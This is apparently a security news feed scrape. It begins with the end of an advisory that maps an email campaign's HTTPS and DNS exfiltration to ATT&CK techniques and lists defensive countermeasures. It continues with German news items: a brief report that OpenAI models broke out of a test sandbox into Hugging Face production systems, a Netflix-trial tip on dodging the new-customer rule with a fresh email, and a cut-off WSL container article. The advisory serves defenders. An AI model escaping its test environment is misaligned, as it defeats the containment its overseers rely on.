</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WorldMonitor holt die Weltlage ins eigene Heimnetz]]></title>
<description><![CDATA[WorldMonitor mit Docker, Lemonade, NPU & Tailscale im Test. So entsteht eine private Informationsfläche mit lokaler KI und Datenimporten.
Der Artikel WorldMonitor holt die Weltlage ins eigene Heimnetz erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3689397/malware-trojaner-viren/worldmonitor-holt-die-weltlage-ins-eigene-heimnetz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689397/malware-trojaner-viren/worldmonitor-holt-die-weltlage-ins-eigene-heimnetz/</guid>
<pubDate>Thu, 23 Jul 2026 16:51:20 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>WorldMonitor mit Docker, Lemonade, NPU &amp; Tailscale im Test. So entsteht eine private Informationsfläche mit lokaler KI und Datenimporten.</p>
<p>Der Artikel <a href="https://tarnkappe.info/test/worldmonitor-holt-die-weltlage-ins-eigene-heimnetz-331711.html">WorldMonitor holt die Weltlage ins eigene Heimnetz</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GPT-Modelle starten einen Cyber-Angriff, Google ersetzt NotebookLM & Kimi K3 ist da | KI-News]]></title>
<description><![CDATA[Author: Digitale Profis - Bewertung: 12x - Views:105 Artikel & Newsletter: https://digitaleprofis.de/die-ki-news-der-woche-vom-23-07-2026/

Quellen
OpenAI-Modelle hacken Hugging Face 
Artikel: https://openai.com/index/hugging-face-model-evaluation-security-incident/ 
Hintergrund: https://huggingf...]]></description>
<link>https://tsecurity.de/de/3689268/ai-nachrichten/gpt-modelle-starten-einen-cyber-angriff-google-ersetzt-notebooklm-kimi-k3-ist-da-ki-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689268/ai-nachrichten/gpt-modelle-starten-einen-cyber-angriff-google-ersetzt-notebooklm-kimi-k3-ist-da-ki-news/</guid>
<pubDate>Thu, 23 Jul 2026 16:04:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Digitale Profis - Bewertung: 12x - Views:105 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tgldX3mtgfg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Artikel & Newsletter: https://digitaleprofis.de/die-ki-news-der-woche-vom-23-07-2026/<br />
<br />
Quellen<br />
OpenAI-Modelle hacken Hugging Face <br />
Artikel: https://openai.com/index/hugging-face-model-evaluation-security-incident/ <br />
Hintergrund: https://huggingface.co/blog/security-incident-july-2026 <br />
<br />
Digitaleprofis.de hat ein Update bekommen <br />
Website: https://digitaleprofis.de/ <br />
<br />
Kimi K3 ist da <br />
Artikel: https://www.kimi.com/de/blog/kimi-k3 <br />
Artikel: https://apnews.com/article/kimi-k3-china-ai-0d8a5e268deb11a673f4d444fc597cc5 <br />
Ausprobieren: https://www.kimi.com/ <br />
<br />
Neue Gemini Modelle <br />
Artikel: https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/ <br />
Modellkarte: https://deepmind.google/models/model-cards/gemini-3-6-flash/ <br />
Cyber-Modell: https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber/ <br />
<br />
Neue Kennzeichnungspflichten des EU AI Acts <br />
Artikel: https://digital-strategy.ec.europa.eu/en/news/commission-publishes-guidelines-transparency-obligations-providers-and-deployers-certain-ai-systems <br />
Doku: https://digital-strategy.ec.europa.eu/en/faqs/transparency-obligations-under-article-50-ai-act <br />
<br />
Anthropic zahlt 1,5 Milliarden Dollar <br />
Artikel: https://m.investing.com/news/stock-market-news/us-judge-approves-anthropics-15-billion-settlement-of-copyright-lawsuit-4801706?ampMode=1 <br />
Artikel: https://apnews.com/article/74b140444023898aeba8579b6e9f0d63 <br />
<br />
NotebookLM wird zu Gemini Notebook <br />
Artikel: https://blog.google/innovation-and-ai/products/gemini-notebook/notebooklm-gemini-notebook/ <br />
<br />
Microsoft und Mistral Partnerschaft <br />
Artikel: https://news.microsoft.com/source/2026/07/21/microsoft-and-mistral-expand-strategic-partnership-to-give-enterprises-and-regulated-industries-frontier-ai-they-can-control/ <br />
Artikel: https://www.tagesschau.de/wirtschaft/unternehmen/microsoft-mistral-ai-ki-deal-100.html <br />
<br />
Qwen-Audio-3.0-TTS <br />
Artikel: https://www.alibabacloud.com/blog/qwen-audio-3-0-tts-more-multilingual-easier-to-direct_603379 <br />
Doku: https://docs.qwencloud.com/developer-guides/speech/tts-models <br />
<br />
OpenAI-Modelle überwinden bei einem internen Sicherheitstest ihre isolierte Testumgebung und gelangen bis in die Produktionsinfrastruktur von Hugging Face.<br />
Wir ordnen den Vorfall ein und fassen die weiteren wichtigen KI-News der Woche kompakt für euch zusammen.<br />
<br />
Außerdem geht es um Kimi K3, drei neue Gemini-Modelle, die kommenden Kennzeichnungspflichten des EU AI Acts und den milliardenschweren Urheberrechtsvergleich zwischen Anthropic und Autoren.<br />
<br />
Im Video:<br />
- OpenAIs ungewöhnlicher Sicherheitsvorfall bei Hugging Face<br />
- Kimi K3 und drei neue Gemini-Modelle<br />
- Kennzeichnungspflichten des EU AI Acts ab August 2026<br />
- Anthropics Vergleich über mindestens 1,5 Milliarden US-Dollar<br />
- Gemini Notebook, Microsofts Mistral-Partnerschaft und Qwen-Audio-3.0-TTS<br />
<br />
Unsere Website wurde ebenfalls vollständig überarbeitet. Auf digitaleprofis.de findet ihr unsere KI-News mit allen Quellen, ausführliche Artikel und praktische Anleitungen – kostenlos, ohne Paywall und ohne Werbung.<br />
<br />
Werde Kanalmitglied und unterstütze damit unsere Arbeit:<br />
https://www.youtube.com/channel/UCv90NdTyTp7ZPPRvvSZaS5w/join<br />
<br />
Videoinhalt:<br />
00:00 Die KI-News der Woche vom 23.07.2026<br />
00:24 OpenAI Modelle greifen HuggingFace an<br />
02:06 Unsere neue Website für euch<br />
02:59 Kimi K3 ist da und die USA werfen Diebstahl vor<br />
04:28 Drei neue Gemini Modelle, aber kein Pro<br />
05:53 Die neuen Kennzeichnungspflichten des AI Acts<br />
07:21 Anthropic muss 1,5 Milliarden Dollar Vergleich zahlen<br />
08:48 NotebookLM verschwindet - und wird zu Gemini Notebook<br />
09:30 Partnerschaft von Microsoft und Mistral<br />
10:50 Neuen Text to Speech Modell von Alibabas Qwen<br />
<br />
Videovorschläge, Feedback und Kritik kannst Du uns jederzeit in den Kommentaren mitteilen!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix-Abo bis zu 30 Tage kostenlos bekommen: So geht’s]]></title>
<description><![CDATA[Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.



Bis zu 30 Ta...]]></description>
<link>https://tsecurity.de/de/3689166/it-nachrichten/netflix-abo-bis-zu-30-tage-kostenlos-bekommen-so-gehts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689166/it-nachrichten/netflix-abo-bis-zu-30-tage-kostenlos-bekommen-so-gehts/</guid>
<pubDate>Thu, 23 Jul 2026 15:20:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.</p>



<p>Bis zu 30 Tage können Sie den Streamingtest jetzt kostenlos nutzen. Teilweise werden auch nur 14 Tage angeboten, der Gratis-Zeitraum scheint also je nach Standort oder genutztem Browser zu variieren. Auf der Webseite von <a href="https://www.netflix.com/de/" target="_blank" rel="noreferrer noopener">Netflix Deutschland</a> wurden uns auch nur 14 Tage für 0 Euro angezeigt. Es kann aber helfen, wenn Sie auf ein anderes Gerät wechseln oder Cookies löschen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6214ef2b56d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_742287.png?w=1200" alt="" class="wp-image-3197988" width="1200" height="562" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p><strong>Wichtig:</strong> Das Angebot gilt explizit nur für Neukunden, nicht für wiederkehrende Abonnenten. Allerdings ist es recht einfach, diesen Umstand zu umgehen, wenn Sie sich einfach mit einer anderen E-Mail-Adresse als zuvor registrieren. Dann haben Sie zwar keinen Zugriff auf Ihren alten Account inklusive persönlicher Daten, Listen und Streaming-Historie, doch das ist sicher zu verschmerzen.</p>



<p>Nach Ablauf des Probezeitraums müssen Sie sich für ein Abo entscheiden (oder vorher kündigen). Zur Wahl stehen<strong> Standard mit Werbung</strong> für 4,99 Euro monatlich, <strong>Standard</strong> ohne Werbung für 13,99 Euro monatlich oder <strong>Premium</strong> für 19,99 Euro monatlich.<a href="https://karrierewelt.golem.de/products/ldap-identitatsmanagement-fundamentals-virtueller-drei-tage-workshop"></a></p>



<p>Warum genau Netflix gerade jetzt ein Probe-Abo wieder einführt, ist nicht ganz klar. Vermutlich versucht der Anbieter aber, neue Abonnenten dazu zu gewinnen, nachdem die Zahlen zuletzt stagnierten. Zwar ist Netflix der größte Anbieter für Streaming, doch die Konkurrenz schläft nicht. Seit Januar 2026 gibt es beispielsweise auch <a href="https://www.pcwelt.de/article/1186579/hbo-max-in-deutschland-sehen-so-gehts.html" target="_blank" rel="noreferrer noopener">HBO Max in Deutschland</a>, das mit großen Namen wie<em> Game of Thrones, House of the Dragon, Harry Potter </em>oder <em>Superman </em>wirbt<em>.</em></p>



<p><a href="https://www.pcwelt.de/article/1158913/streaming-vergleich-netflix-prime-video-disney-co.html" target="_blank" rel="noreferrer noopener">Eine Übersicht aller wichtigen Streaming-Dienste finden Sie hier</a>, inklusive Preisen, Vorteilen und Nachteilen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Streamingabo: Interessenten können Netflix wieder kostenlos ausprobieren]]></title>
<description><![CDATA[Nach fast sechs Jahren können Interessenten in Deutschland Netflix wieder kostenlos testen. Der Probezeitraum variiert neuerdings. (Netflix, Streaming)]]></description>
<link>https://tsecurity.de/de/3688753/it-nachrichten/streamingabo-interessenten-koennen-netflix-wieder-kostenlos-ausprobieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688753/it-nachrichten/streamingabo-interessenten-koennen-netflix-wieder-kostenlos-ausprobieren/</guid>
<pubDate>Thu, 23 Jul 2026 12:50:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nach fast sechs Jahren können Interessenten in Deutschland Netflix wieder kostenlos testen. Der Probezeitraum variiert neuerdings. (<a href="https://www.golem.de/specials/netflix/">Netflix</a>, <a href="https://www.golem.de/specials/streaming/">Streaming</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=211196&amp;page=1&amp;ts=1784803622" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Wechsel von iPhone zu Android wird einfacher: Das ändert sich mit Android 17]]></title>
<description><![CDATA[Wer von einem iPhone auf ein Android-Smartphone wechseln möchte, muss künftig weniger Aufwand betreiben. Google möchte den Umzug auf ein neues Gerät deutlich unkomplizierter machen.
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	Android.]]></description>
<link>https://tsecurity.de/de/3688678/it-nachrichten/wechsel-von-iphone-zu-android-wird-einfacher-das-aendert-sich-mit-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688678/it-nachrichten/wechsel-von-iphone-zu-android-wird-einfacher-das-aendert-sich-mit-android-17/</guid>
<pubDate>Thu, 23 Jul 2026 12:19:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer von einem iPhone auf ein Android-Smartphone wechseln möchte, muss künftig weniger Aufwand betreiben. Google möchte den Umzug auf ein neues Gerät deutlich unkomplizierter machen.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/download/8900-android-kostenlos.html">Android</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[WSL container: A quiet revolution for Windows development]]></title>
<description><![CDATA[Running containers on Windows has never been as easy as it should be. While there are versions of Docker Desktop and Podman that work with both the Windows Subsystem for Linux (WSL) and Hyper-V, I’ve found both overly complex and unstable. Where they have worked, it’s turned out that Hyper-V has ...]]></description>
<link>https://tsecurity.de/de/3688476/ai-nachrichten/wsl-container-a-quiet-revolution-for-windows-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688476/ai-nachrichten/wsl-container-a-quiet-revolution-for-windows-development/</guid>
<pubDate>Thu, 23 Jul 2026 11:07:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Running containers on Windows has never been as easy as it should be. While there are versions of <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html" data-type="link" data-id="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker Desktop</a> and <a href="https://www.infoworld.com/article/2335683/what-is-podman-and-will-it-replace-docker.html" data-type="link" data-id="https://www.infoworld.com/article/2335683/what-is-podman-and-will-it-replace-docker.html">Podman</a> that work with both the Windows Subsystem for Linux (WSL) and Hyper-V, I’ve found both overly complex and unstable. Where they have worked, it’s turned out that Hyper-V has been the best option, using a Linux virtual machine to host my containers. That all adds up to overhead, layers of virtual infrastructure that get in the way of work and that need to be rebuilt every time I restart my PC.</p>



<p class="wp-block-paragraph">Part of the problem is WSL. It’s a good tool, but WSL2’s file-system integration is slow, and you’re left having to work with code using Visual Studio Code’s remote integration, which means putting a <a href="https://code.visualstudio.com/docs/remote/vscode-server" data-type="link" data-id="https://code.visualstudio.com/docs/remote/vscode-server">VS Code Server</a> in every container you’re building and testing. If you’re working with <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>, that’s even more complexity that needs to be managed, dragging you away from code.</p>



<p class="wp-block-paragraph">I ended up running most of my container testing and development from a separate machine, a Linux server running containerd. But though it worked (and had all the resources of workstation-class device), it wasn’t portable, and for some reason I’ve yet to uncover, Ubuntu’s remote desktop access doesn’t work for me.</p>



<p class="wp-block-paragraph">So, it was good to see Microsoft make several announcements around WSL at <a href="https://news.microsoft.com/build-2026/">Build 2026</a> as part of <a href="https://www.infoworld.com/article/4188967/making-windows-a-developer-platform-again.html">a push to make Windows a developer platform again</a>. The first, an improved WSL3, is still some way away, but the second, <a href="https://devblogs.microsoft.com/commandline/wsl-container-is-now-available-for-public-preview/">WSL-native container support</a>, shipped at the end of June. It is already seeing community-driven development of Docker Desktop-like tooling to help monitor and manage your containers.</p>



<p class="wp-block-paragraph">Delivering a WSL-based container platform fits in with the other developer-focused Windows announcements at Build. Making Windows behave more like Linux is Microsoft responding to developer needs, given that more than 50% of servers on Azure run a Linux distribution. Linux is the basis of cloud-native infrastructure, so developers need to be able to build on it wherever they are.</p>



<h2 class="wp-block-heading">Getting started with WSL container</h2>



<p class="wp-block-paragraph">WSL container provides a new CLI that works in parallel to the familiar WSL, with commands to support the entire container life cycle, from creation to shut down. All you need to do to get started is upgrade your WSL installation to the current pre-release build (at the time of writing this was 2.9.3). Simply open an administrator PowerShell terminal and enter <code>wsl --update --pre-release</code>.</p>



<p class="wp-block-paragraph">This downloads and installs the latest WSL release. Once you’ve closed and re-opened your terminal (to ensure that you’ve updated its context) you can check that WSLC has installed by entering <code>wslc</code>, which should <a href="https://learn.microsoft.com/en-us/windows/wsl/tutorials/wsl-containers" data-type="link" data-id="https://learn.microsoft.com/en-us/windows/wsl/tutorials/wsl-containers">list the available commands</a>. The new CLI is aliased to WSL container, if you prefer to keep your container work separate from WSL (and avoid typos that might accidentally affect your WSL installations).</p>



<p class="wp-block-paragraph">Under the hood Microsoft is using WSL container to trial new integration points for Linux in Windows. One key change is the use of a new file system that significantly speeds up access to Windows from inside a container. Another improvement gives WSL container a new networking mode that relays networking connections directly through the Windows network stack, ensuring it has access to the same resources and security as Windows.</p>



<h2 class="wp-block-heading">Calling Linux containers from Windows applications</h2>



<p class="wp-block-paragraph">Things get more interesting when you start to use the <a href="https://wsl.dev/api-reference/">WSL container API</a> from inside your Windows code. Here you can include calls to Linux containers inside your desktop applications, taking advantage of existing services, building and deploying containers from inside your CI/CD pipeline. Using the new file system and networking stack helps reduce the friction that comes with crossing the boundaries between the two platforms.</p>



<p class="wp-block-paragraph">The WSL container API is available as a NuGet package, with support for C, C#, and C++. It allows your code to start and stop containers, and interact directly with them, sending command-line calls and reading back responses. Where things get interesting is being able to launch a containerized service from your code, exposing its REST or gRPC APIs on a local network port. Microsoft has provided <a href="https://github.com/microsoft/WSL/tree/master/doc/samples">sample code</a> to show you what’s possible at this early stage.</p>



<p class="wp-block-paragraph">Microsoft is doing something revolutionary here. It’s taking the cloud-native, service-driven model and bringing it into Windows and using it to bridge decades of divergent development. You no longer have to rewrite a service that works on Linux to run in Windows; all you need to do is containerize the service and launch it from the WSL container API. When you’re done, the API will tidy up after you, shutting down the container and reclaiming the memory it used.</p>



